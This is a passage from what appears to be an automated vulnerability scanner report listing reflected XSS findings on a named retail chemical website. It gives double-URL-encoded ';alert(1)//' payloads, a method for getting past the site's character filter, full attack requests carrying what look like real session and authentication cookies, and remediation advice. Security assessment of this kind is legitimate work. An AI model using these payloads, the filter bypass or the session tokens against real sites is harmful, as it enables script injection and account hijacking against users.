Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Aldrich/Brochure/db3a5%2522%253balert%25281%2529%252f%252f5df5dbd717c/al_chemfile_v5_n1.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:49 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Aldrich/Brochure/db3a5";alert(1)//5df5dbd717c/al_chemfile_v5_n1.pdf","E404") ;
   </script>
...[SNIP]...

1.278. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7876%2522%253balert%25281%2529%252f%252f68b0607b97f was submitted in the REST URL parameter 1. This input was echoed as e7876";alert(1)//68b0607b97f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etce7876%2522%253balert%25281%2529%252f%252f68b0607b97f/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:20 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etce7876";alert(1)//68b0607b97f/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.279. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98b2b%2522%253balert%25281%2529%252f%252fd06e6a724d2 was submitted in the REST URL parameter 2. This input was echoed as 98b2b";alert(1)//d06e6a724d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib98b2b%2522%253balert%25281%2529%252f%252fd06e6a724d2/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:25 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib98b2b";alert(1)//d06e6a724d2/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.280. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86950%2522%253balert%25281%2529%252f%252f3a18cbc134e was submitted in the REST URL parameter 3. This input was echoed as 86950";alert(1)//3a18cbc134e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs86950%2522%253balert%25281%2529%252f%252f3a18cbc134e/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:34 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs86950";alert(1)//3a18cbc134e/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.281. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b2c2%2522%253balert%25281%2529%252f%252fa3cc5989315 was submitted in the REST URL parameter 4. This input was echoed as 9b2c2";alert(1)//a3cc5989315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Aldrich9b2c2%2522%253balert%25281%2529%252f%252fa3cc5989315/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:39 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Aldrich9b2c2";alert(1)//a3cc5989315/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.282. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf

Issue detail

